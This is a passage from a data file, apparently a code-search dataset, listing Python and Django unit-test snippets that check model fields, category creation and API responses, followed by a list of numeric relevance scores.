reverse('blog_api:listcreate')\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)", "def setUp(self):\n db.drop_all()\n db.create_all()\n\n self.uid = 1000\n # create category \n cat = Category.retrieve_or_add('Business')\n self.cat = cat\n # create user \n u = User.signup('testuser', 'test@test.com', 'password', cat.id)\n u.id = self.uid\n db.session.commit()\n\n self.u = User.query.get(self.uid)", "def test_photo_classification_view_set_post_category_not_allowed(self):\n # Test data\n user = account_models.User.objects.get(email='mrtest@mypapaya.io')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'category'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n\n self.assertEquals(request.status_code, 400)\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 11)", "def setUp(self):\n fun = Category(name=\"funny\")\n fun.save()\n lagos = Location(name=\"Lagos\")\n lagos.save()\n self.new_image = Pics(\n name=\"image\", description=\"h\", location=lagos, category=fun)", "def categories(data):\n if data:\n for i in data:\n category = CategoriesModel(categories=i['categories'])\n category.save()", "def test_product_fields(self):\n\n prd = Product.objects.get(id=1)\n\n # test the type of name field\n prd_type = prd._meta.get_field('name').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label name\n max_length = prd._meta.get_field('name').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label name\n prd_blank = prd._meta.get_field('name').blank\n self.assertTrue(prd_blank)\n # test null field in label name\n prd_null = prd._meta.get_field('name').null\n self.assertTrue(prd_null)\n\n # test the type of description field\n prd_type = prd._meta.get_field('description').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label description\n max_length = prd._meta.get_field('description').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label description\n prd_blank = prd._meta.get_field('description').blank\n self.assertTrue(prd_blank)\n # test null field in label description\n prd_null = prd._meta.get_field('description').null\n self.assertTrue(prd_null)\n\n # test the type of nutrition_grade field\n prd_type = prd._meta.get_field('nutrition_grade').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label nutrition_grade\n max_length = prd._meta.get_field('nutrition_grade').max_length\n self.assertEqual(max_length, 1)\n # test blank field in label nutrition_grade\n prd_blank = prd._meta.get_field('nutrition_grade').blank\n self.assertTrue(prd_blank)\n # test null field in label nutrition_grade\n prd_null = prd._meta.get_field('nutrition_grade').null\n self.assertTrue(prd_null)\n\n # test the type of barcode field\n prd_type = prd._meta.get_field('barcode').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label barcode\n max_length = prd._meta.get_field('barcode').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label barcode\n prd_blank = prd._meta.get_field('barcode').blank\n self.assertFalse(prd_blank)\n # test null field in label barcode\n prd_null = 
prd._meta.get_field('barcode').null\n self.assertFalse(prd_null)\n\n # test the type of url field\n prd_type = prd._meta.get_field('url').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url\n max_length = prd._meta.get_field('url').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url\n prd_blank = prd._meta.get_field('url').blank\n self.assertTrue(prd_blank)\n # test null field in label url\n prd_null = prd._meta.get_field('url').null\n self.assertTrue(prd_null)\n\n # test the type of url_pic field\n prd_type = prd._meta.get_field('url_pic').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url_pic\n max_length = prd._meta.get_field('url_pic').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url_pic\n prd_blank = prd._meta.get_field('url_pic').blank\n self.assertTrue(prd_blank)\n # test null field in label url_pic\n prd_null = prd._meta.get_field('url_pic').null\n self.assertTrue(prd_null)\n\n # test the type of store field\n prd_type = prd._meta.get_field('store').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label store\n max_length = prd._meta.get_field('store').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label store\n prd_blank = prd._meta.get_field('store').blank\n self.assertTrue(prd_blank)\n # test null field in label store\n prd_null = prd._meta.get_field('store').null\n self.assertTrue(prd_null)\n\n # test the type of fat field\n prd_type = prd._meta.get_field('fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label fat max digits\n max_digits = prd._meta.get_field('fat').max_digits\n self.assertEqual(max_digits, 5)\n # label fat decimal places\n dec_places = prd._meta.get_field('fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label fat\n prd_blank = prd._meta.get_field('fat').blank\n self.assertTrue(prd_blank)\n # test null field in label fat\n prd_null = prd._meta.get_field('fat').null\n self.assertTrue(prd_null)\n\n # test the type of saturated_fat field\n prd_type = prd._meta.get_field('saturated_fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label saturated_fat max digits\n max_digits = prd._meta.get_field('saturated_fat').max_digits\n self.assertEqual(max_digits, 5)\n # label saturated_fat decimal places\n dec_places = prd._meta.get_field('saturated_fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label saturated_fat\n prd_blank = prd._meta.get_field('saturated_fat').blank\n self.assertTrue(prd_blank)\n # test null field in label saturated_fat\n prd_null = prd._meta.get_field('saturated_fat').null\n self.assertTrue(prd_null)\n\n # test the type of sugar field\n prd_type = prd._meta.get_field('sugar').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label sugar max digits\n max_digits = prd._meta.get_field('sugar').max_digits\n self.assertEqual(max_digits, 5)\n # label sugar decimal places\n dec_places = prd._meta.get_field('sugar').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label sugar\n prd_blank = prd._meta.get_field('sugar').blank\n self.assertTrue(prd_blank)\n # test null field in label sugar\n prd_null = prd._meta.get_field('sugar').null\n self.assertTrue(prd_null)\n\n # test the type of salt\n prd_type = prd._meta.get_field('salt').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label salt max digits\n max_digits = 
prd._meta.get_field('salt').max_digits\n self.assertEqual(max_digits, 5)\n # label salt decimal places\n dec_places = prd._meta.get_field('salt').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label salt\n prd_blank = prd._meta.get_field('salt').blank\n self.assertTrue(prd_blank)\n # test null field in label salt\n prd_null = prd._meta.get_field('salt').null\n self.assertTrue(prd_null)\n\n # test the type of prd_cat\n prd_type = prd._meta.get_field('prd_cat').get_internal_type()\n self.assertEqual(prd_type, 'ForeignKey')\n # label db_column\n fk = prd._meta.get_field('prd_cat').db_column\n self.assertEqual(fk, 'prd_cat')\n # test blank field in label prd_cat\n prd_blank = prd._meta.get_field('prd_cat').blank\n self.assertFalse(prd_blank)\n # test null field in label prd_cat\n prd_null = prd._meta.get_field('prd_cat').null\n self.assertFalse(prd_null)\n\n # Favourite table ----------------------------------------------------", "def test_add_relation_types(self):\n pass", "def test_Product(self):\n self.assertEquals(self.prod_1.pk, 1)\n self.assertEquals(self.prod_1.ean, '3350033118072')\n self.assertEquals(self.prod_1.name, 'test 1')\n self.assertEquals(self.prod_1.nutriscore, 'u')\n self.assertEquals(self.prod_1.category, 'cat 1')", "def attribute(self, data, model, model_name):", "def test_create_category_with_invalid_details_fails(self):\n res = self.client.post(CATEGORY_URL, {})\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n res.data['errors']['name'][0],\n 'This field is required.')", "def test_attr(self):\n self.assertTrue(hasattr(self.amenity, \"created_at\"))\n self.assertTrue(hasattr(self.amenity, \"id\"))\n self.assertTrue(hasattr(self.amenity, \"updated_at\"))\n self.assertFalse(hasattr(self.amenity, \"random_attr\"))\n self.assertTrue(hasattr(self.amenity, \"name\"))\n self.assertEqual(self.amenity.__class__.__name__, \"Amenity\")\n self.assertEqual(self.amenity.name, \"\")", "def _testRatingCategories(self):\n\n\n try:\n user = auth.User.objects.all()[0]\n category = models.Category.objects.all()[0]\n host = models.Host(user=user, category=category,\n url='http://blah.com')\n host.save()\n\n comment = models.Comment(text='test', host=host)\n comment.save()\n\n types = models.RatingType.objects.all()\n\n items = []\n for value, type in zip([3, 4, 5], types):\n tmp_obj = models.Rating(comment=comment, type=type, value=value)\n tmp_obj.save()\n items.append(tmp_obj)\n\n assert comment.rating() - 4.0 < .0001, comment.rating()\n\n comment2 = models.Comment(text='test', host=host)\n comment2.save()\n\n for value, type in zip([3, 3, 3], types):\n tmp_obj = models.Rating(comment=comment2, type=type, value=value)\n tmp_obj.save()\n items.append(tmp_obj)\n\n assert comment2.rating() - 3.0 < .0001, comment2.rating()\n\n assert host.rating() == 3.5, host.rating()\n\n ratings = host.ratings()\n assert ratings['Support'] == 3.5, ratings\n assert ratings['Features'] == 3.0\n assert ratings['Uptime'] == 4.0\n\n finally:\n try:\n for tmp_obj in items:\n tmp_obj.delete()\n \n comment.delete()\n comment2.delete()\n host.delete()\n except:\n pass", "def test_model_can_create_a_film(self):\n self.assertEqual(self.film.title, \"test_a\")", "def test_blank_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n rv = self.category('')\n self.assertIn(b'Field must be between 1 and 50 characters long.', rv.data)", "def test_extract_categories():\n pass", "def 
test_create(self):\n lvl = AcademicLevel.objects.create(\n name=\"random_academic_level\",\n )\n\n self.assertEqual(lvl.__str__(), \"random_academic_level\")" ]
[ "0.7511274", "0.74611753", "0.7387198", "0.7346792", "0.7272893", "0.721909", "0.6904485", "0.69011027", "0.6842334", "0.67509025", "0.67248386", "0.6717649", "0.6624068", "0.656367", "0.6542668", "0.6540674", "0.65404874", "0.6470544", "0.646362", "0.64630693", "0.64449406", "0.64380944", "0.6420919", "0.63919896", "0.63862425", "0.63689536", "0.6335148", "0.63275295", "0.630453", "0.6263592", "0.6256702", "0.6240916", "0.62289137", "0.621453", "0.62130475", "0.6187344", "0.61701363", "0.6156475", "0.61532557", "0.6147836", "0.61463803", "0.6134411", "0.6126971", "0.6114183", "0.60760576", "0.6072388", "0.6069807", "0.60636544", "0.60524374", "0.604647", "0.60384077", "0.602763", "0.60171455", "0.6016896", "0.6015665", "0.6015262", "0.6014618", "0.6013886", "0.60111725", "0.5996032", "0.59893495", "0.5982667", "0.59728646", "0.59694654", "0.5968645", "0.5956622", "0.59555805", "0.5949529", "0.5928767", "0.59239477", "0.5923543", "0.5922495", "0.59057546", "0.5897322", "0.58957684", "0.5893867", "0.5891196", "0.5889996", "0.58883166", "0.588063", "0.5876221", "0.58680284", "0.5856271", "0.58482504", "0.58426625", "0.5825181", "0.5821702", "0.58140576", "0.5810927", "0.58058816", "0.57933843", "0.5784194", "0.5784034", "0.57836735", "0.5779272", "0.5776196", "0.57693905", "0.57685566", "0.57648873", "0.57622737" ]
0.80247825
0
Test Category model default name
def test_category_model_entry(self):
    data = self.data1
    self.assertEqual(str(data), 'django')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __str__(self):\n return self.category_name", "def test_category_name_label(self):\n\n cat = Category.objects.get(id=1)\n label_name = cat._meta.get_field('name').verbose_name\n self.assertEqual(label_name, 'name')", "def make_test_category(self):\n\n c = Category(slug='test')\n\n return c", "def __str__(self):\n return self.cat_name", "def get_default_category():\n return Category.objects.get_or_create(name='Unknown')[0]", "def test_category_lowercase(self):\n self.assertEqual(self.category.category, \"test\")", "def get_name(self):\n return self.category_name", "def test_model_string_representation(self, init_db, category):\n assert repr(category) == f'<Category: {category.name}>'", "def category_name(self):\n return self.category.name", "def getCategory():", "def name(self) -> str:\n return str(self.category.value)", "def sample_category(name='place'):\n return Category.objects.create(name=name)", "def test_create_category(self):\n pass", "def __init__(self, category):\n self.category = category\n self.name = \"Filters.document.category('{}')\".format(self.category)", "def default_model():\n return \"teenytweetynet\"", "def model_name(self) -> str:\n return \"mock-model-name\"", "def __init__(self, display_name, model, category='OTHER', **kwargs):\n super().__init__(display_name, **kwargs)\n set_accessory_info(self, display_name, model)\n self.category = getattr(Category, category, Category.OTHER)", "def category_name(self):\n try:\n category = self.proto.category.parent\n return f'{category.name} - {self.proto.category.name}'\n except AttributeError:\n return self.proto.category.name", "def get_category_name(self):\n return self._ctx.get(\"name\", self._ctx[\"id\"])", "def category(self):\n return self._ctx.get(\"name\", self._ctx[\"id\"])", "def test_init_with_default_value_string(self):\n categories = {\"asdfa\": 0.1, 2: 0.2, 3: 0.3, \"lalala\": 0.4}\n dim = Categorical(\"yolo\", categories, default_value=\"asdfa\")\n\n assert type(dim.default_value) is str", "def __str__(self):\n \n return \"Category ID: %s %s\" % (self.category_id, self.name)", "def get_category(self) -> str:\n return self.category", "def __init__(self, cat_name):\n super(Cat, self).__init__(cat_name)", "def test_get_name(self):\n name = \"The Name\"\n event_category = EventCategory(name=name)\n self.assertEqual(name, str(event_category), msg=(\n 'Method ``__str__`` did not output event category name.'))", "def category(self) -> str:\n return pulumi.get(self, \"category\")", "def create_category():\n category = Category(name='testcategory', description=\"\", fee=DEFAULT_FEE)\n category.save()\n return category", "def get_model_title(self):\n pass", "def test_create_category_with_existing_name(self):\n sample_category()\n res = self.client.post(CATEGORY_URL, {\"name\": \"place\"})\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n res.data['errors']['name'][0],\n 'This field must be unique.')", "def test_auto_slug(self):\n category = Category.objects.create()\n translation = CategoryTranslation.objects.create(\n name=\"Charter Schools\", category=category)\n self.assertEqual(category.slug, \"charter-schools\")", "def category_title(self):\n categories = {c[0]:c[1] for c in self.CATEGORY_CHOICES}\n if self.category in categories:\n return categories[self.category]", "def category(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"category\")", "def test_0005_create_categories(self):\n self.create_category(name='Test 0060 Workflow Features', description='Test 0060 - 
Workflow Features')", "def get_model_name(ind: int) -> str:\n return f'{fizz_name}-{fizz_type.model_name}'", "def get_model_name():\n return 'Central Tendency'", "def test_model_name_value(self):\n \n model_name = get_model()[0]\n \n # Check to make sure the model_name is 'iMac'\n self.assertEqual(model_name, 'iMac')", "def __str__(self):\n return '%s%s' % (self.name, ' - %s' % self.model if self.model else '')", "def display_name(self):", "def default_name(self):\n return '[' + self.__class__.__name__ + ']'", "def __str__(self):\r\n return self.name", "def __str__(self):\r\n return self.name", "def __str__(self):\r\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name", "def __str__(self):\n return self.name" ]
[ "0.69887996", "0.69840467", "0.6772042", "0.6648228", "0.6618688", "0.6510455", "0.6509711", "0.6475036", "0.64495313", "0.63525605", "0.6342909", "0.62700176", "0.6242026", "0.6151665", "0.61083674", "0.60542405", "0.6046889", "0.59698623", "0.5938677", "0.5932067", "0.5917186", "0.58800954", "0.582827", "0.58030266", "0.5792314", "0.5782522", "0.5781612", "0.57796735", "0.57671475", "0.5764285", "0.57642704", "0.57528406", "0.5752046", "0.5741812", "0.57331395", "0.5732029", "0.5723601", "0.5719983", "0.5718784", "0.56973827", "0.56973827", "0.56973827", "0.5690021", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063", "0.5681063" ]
0.0
-1
Test product model data insertion/types/field attributes
def test_products_model_entry(self):
    data = self.data1
    self.assertTrue(isinstance(data, Product))
    self.assertEqual(str(data), 'django beginners')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_product_fields(self):\n\n prd = Product.objects.get(id=1)\n\n # test the type of name field\n prd_type = prd._meta.get_field('name').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label name\n max_length = prd._meta.get_field('name').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label name\n prd_blank = prd._meta.get_field('name').blank\n self.assertTrue(prd_blank)\n # test null field in label name\n prd_null = prd._meta.get_field('name').null\n self.assertTrue(prd_null)\n\n # test the type of description field\n prd_type = prd._meta.get_field('description').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label description\n max_length = prd._meta.get_field('description').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label description\n prd_blank = prd._meta.get_field('description').blank\n self.assertTrue(prd_blank)\n # test null field in label description\n prd_null = prd._meta.get_field('description').null\n self.assertTrue(prd_null)\n\n # test the type of nutrition_grade field\n prd_type = prd._meta.get_field('nutrition_grade').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label nutrition_grade\n max_length = prd._meta.get_field('nutrition_grade').max_length\n self.assertEqual(max_length, 1)\n # test blank field in label nutrition_grade\n prd_blank = prd._meta.get_field('nutrition_grade').blank\n self.assertTrue(prd_blank)\n # test null field in label nutrition_grade\n prd_null = prd._meta.get_field('nutrition_grade').null\n self.assertTrue(prd_null)\n\n # test the type of barcode field\n prd_type = prd._meta.get_field('barcode').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label barcode\n max_length = prd._meta.get_field('barcode').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label barcode\n prd_blank = prd._meta.get_field('barcode').blank\n self.assertFalse(prd_blank)\n # test null field in label barcode\n prd_null = prd._meta.get_field('barcode').null\n self.assertFalse(prd_null)\n\n # test the type of url field\n prd_type = prd._meta.get_field('url').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url\n max_length = prd._meta.get_field('url').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url\n prd_blank = prd._meta.get_field('url').blank\n self.assertTrue(prd_blank)\n # test null field in label url\n prd_null = prd._meta.get_field('url').null\n self.assertTrue(prd_null)\n\n # test the type of url_pic field\n prd_type = prd._meta.get_field('url_pic').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label url_pic\n max_length = prd._meta.get_field('url_pic').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label url_pic\n prd_blank = prd._meta.get_field('url_pic').blank\n self.assertTrue(prd_blank)\n # test null field in label url_pic\n prd_null = prd._meta.get_field('url_pic').null\n self.assertTrue(prd_null)\n\n # test the type of store field\n prd_type = prd._meta.get_field('store').get_internal_type()\n self.assertEqual(prd_type, 'CharField')\n # label store\n max_length = prd._meta.get_field('store').max_length\n self.assertEqual(max_length, 255)\n # test blank field in label store\n prd_blank = prd._meta.get_field('store').blank\n self.assertTrue(prd_blank)\n # test null field in label store\n prd_null = prd._meta.get_field('store').null\n self.assertTrue(prd_null)\n\n # test the type of fat field\n prd_type = 
prd._meta.get_field('fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label fat max digits\n max_digits = prd._meta.get_field('fat').max_digits\n self.assertEqual(max_digits, 5)\n # label fat decimal places\n dec_places = prd._meta.get_field('fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label fat\n prd_blank = prd._meta.get_field('fat').blank\n self.assertTrue(prd_blank)\n # test null field in label fat\n prd_null = prd._meta.get_field('fat').null\n self.assertTrue(prd_null)\n\n # test the type of saturated_fat field\n prd_type = prd._meta.get_field('saturated_fat').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label saturated_fat max digits\n max_digits = prd._meta.get_field('saturated_fat').max_digits\n self.assertEqual(max_digits, 5)\n # label saturated_fat decimal places\n dec_places = prd._meta.get_field('saturated_fat').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label saturated_fat\n prd_blank = prd._meta.get_field('saturated_fat').blank\n self.assertTrue(prd_blank)\n # test null field in label saturated_fat\n prd_null = prd._meta.get_field('saturated_fat').null\n self.assertTrue(prd_null)\n\n # test the type of sugar field\n prd_type = prd._meta.get_field('sugar').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label sugar max digits\n max_digits = prd._meta.get_field('sugar').max_digits\n self.assertEqual(max_digits, 5)\n # label sugar decimal places\n dec_places = prd._meta.get_field('sugar').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label sugar\n prd_blank = prd._meta.get_field('sugar').blank\n self.assertTrue(prd_blank)\n # test null field in label sugar\n prd_null = prd._meta.get_field('sugar').null\n self.assertTrue(prd_null)\n\n # test the type of salt\n prd_type = prd._meta.get_field('salt').get_internal_type()\n self.assertEqual(prd_type, 'DecimalField')\n # label salt max digits\n max_digits = prd._meta.get_field('salt').max_digits\n self.assertEqual(max_digits, 5)\n # label salt decimal places\n dec_places = prd._meta.get_field('salt').decimal_places\n self.assertEqual(dec_places, 2)\n # test blank field in label salt\n prd_blank = prd._meta.get_field('salt').blank\n self.assertTrue(prd_blank)\n # test null field in label salt\n prd_null = prd._meta.get_field('salt').null\n self.assertTrue(prd_null)\n\n # test the type of prd_cat\n prd_type = prd._meta.get_field('prd_cat').get_internal_type()\n self.assertEqual(prd_type, 'ForeignKey')\n # label db_column\n fk = prd._meta.get_field('prd_cat').db_column\n self.assertEqual(fk, 'prd_cat')\n # test blank field in label prd_cat\n prd_blank = prd._meta.get_field('prd_cat').blank\n self.assertFalse(prd_blank)\n # test null field in label prd_cat\n prd_null = prd._meta.get_field('prd_cat').null\n self.assertFalse(prd_null)\n\n # Favourite table ----------------------------------------------------", "def test_product_create(self):\n self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])", "def test_Product(self):\n self.assertEquals(self.prod_1.pk, 1)\n self.assertEquals(self.prod_1.ean, '3350033118072')\n self.assertEquals(self.prod_1.name, 'test 1')\n self.assertEquals(self.prod_1.nutriscore, 'u')\n self.assertEquals(self.prod_1.category, 'cat 1')", "def test_product(self):\n self.assertEqual(self.test_product.name, self.test_product_name)\n self.assertEqual(self.test_product.price, self.test_product_price)", "def 
setUpTestData(cls):\n Product_type.objects.create(\n name='New_Product', display_name='New Product.')", "def test_object_creation(self):\n serializer = ProductSerializer(data=self.data)\n self.assertTrue(serializer.is_valid())\n product = serializer.save()\n\n self.assertEqual(product.title, self.title)\n self.assertEqual(product.description, self.description)\n self.assertEqual(product.price, self.price)\n self.assertTrue(product.is_active)\n self.assertTrue(product.available)", "def test_product_update(self):\n # first performe create\n id = self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])\n if id:\n # then performe update\n data = { \n \"name\": \"Changed the name\",\n \"description\": self.product_data[\"description\"],\n \"image_link\": self.product_data[\"image_link\"],\n \"price\": self.product_data[\"price\"]\n }\n self._update_model(\"product\", id, data, [\"name\"])\n self.assertIsNotNone(id)", "def test_products_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Recipe))\n self.assertEqual(str(data), 'django beginners')", "def test_prep_new_data(self):\n pass", "def test_new_product(self):\n prod = Product(name='New Product', price=100, weight=60,\n flammability=0.9)\n self.assertEqual(prod.explode(), '...BABOOM!!')\n self.assertEqual(prod.stealability(), 'Very stealable!')", "def test_custom_attribute_post(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_values\": [{\n \"attribute_value\": \"my custom attribute value\",\n \"custom_attribute_id\": cad.id,\n }],\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n ca_json = response.json[0][1][\"product\"][\"custom_attribute_values\"][0]\n self.assertIn(\"attributable_id\", ca_json)\n self.assertIn(\"attributable_type\", ca_json)\n self.assertIn(\"attribute_value\", ca_json)\n self.assertIn(\"id\", ca_json)\n self.assertEqual(ca_json[\"attribute_value\"],\n \"my custom attribute value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"my custom attribute value\"\n )", "def test_update_attribute_data(self):\n pass", "def test_custom_attribute_put_add(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n product_url = response.json[0][1][\"product\"][\"selfLink\"]\n headers = self.client.get(product_url).headers\n\n product_data[0][\"product\"][\"custom_attribute_values\"] = 
[{\n \"attribute_value\": \"added value\",\n \"custom_attribute_id\": cad.id,\n }]\n\n response = self._put(product_url, product_data[0], extra_headers={\n 'If-Unmodified-Since': headers[\"Last-Modified\"],\n 'If-Match': headers[\"Etag\"],\n })\n\n product = response.json[\"product\"]\n\n self.assertEqual(len(product[\"custom_attribute_values\"]), 1)\n ca_json = product[\"custom_attribute_values\"][0]\n self.assertIn(\"attributable_id\", ca_json)\n self.assertIn(\"attributable_type\", ca_json)\n self.assertIn(\"attribute_value\", ca_json)\n self.assertIn(\"id\", ca_json)\n self.assertEqual(ca_json[\"attribute_value\"],\n \"added value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"added value\"\n )\n\n headers = self.client.get(product_url).headers\n\n product_data[0][\"product\"][\"custom_attribute_values\"] = [{\n \"attribute_value\": \"edited value\",\n \"custom_attribute_id\": cad.id,\n }]\n\n response = self._put(product_url, product_data[0], extra_headers={\n 'If-Unmodified-Since': headers[\"Last-Modified\"],\n 'If-Match': headers[\"Etag\"],\n })\n\n product = response.json[\"product\"]\n ca_json = product[\"custom_attribute_values\"][0]\n self.assertIn(\"attributable_id\", ca_json)\n self.assertIn(\"attributable_type\", ca_json)\n self.assertIn(\"attribute_value\", ca_json)\n self.assertIn(\"id\", ca_json)\n self.assertEqual(ca_json[\"attribute_value\"],\n \"edited value\")", "def test_update_product_required_fields(self):\n data = {\n 'pk': 1,\n 'name': None,\n 'description': '''\n Yogurt also spelled yoghurt, yogourt or yoghourt,\n is a food produced by bacterial fermentation of milk.\n '''\n }\n url = reverse('products:detail', kwargs={'pk': data['pk']})\n response = self.client.put(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(models.Product.objects.filter(name=None).count(), 0)", "def test_prep_fields(self):\n pass", "def setUp(self):\n super().setUp()\n list_of_product_types = [\n 'default_product_variant',\n 'multiple_product_variants',\n 'ceo_title'\n ]\n self.new_product = eval(f\"get_new_product_with_\" \\\n f\"{list_of_product_types[randint(0, len(list_of_product_types) - 1)]}()\")\n response = ProcessRequest('products.json').send_request(\n 'POST',\n data=self.new_product,\n expected_return_codes=[201],\n )\n self.product_id = response.response['product']['id']", "def test_02_product_update(self):\n # Update new product state2 from default draft to sellable\n new_product = self.create_product()\n self.assertEqual(new_product.state2, 'draft')\n new_product.state2 = 'sellable'\n self.assertEqual(new_product.state2, 'sellable')\n\n # Same but to an existing demo product.\n demo_product = self.product_obj.browse(\n self.ref('product_lifecycle.product_product_4g'))\n self.assertEqual(demo_product.state2, 'sellable')\n 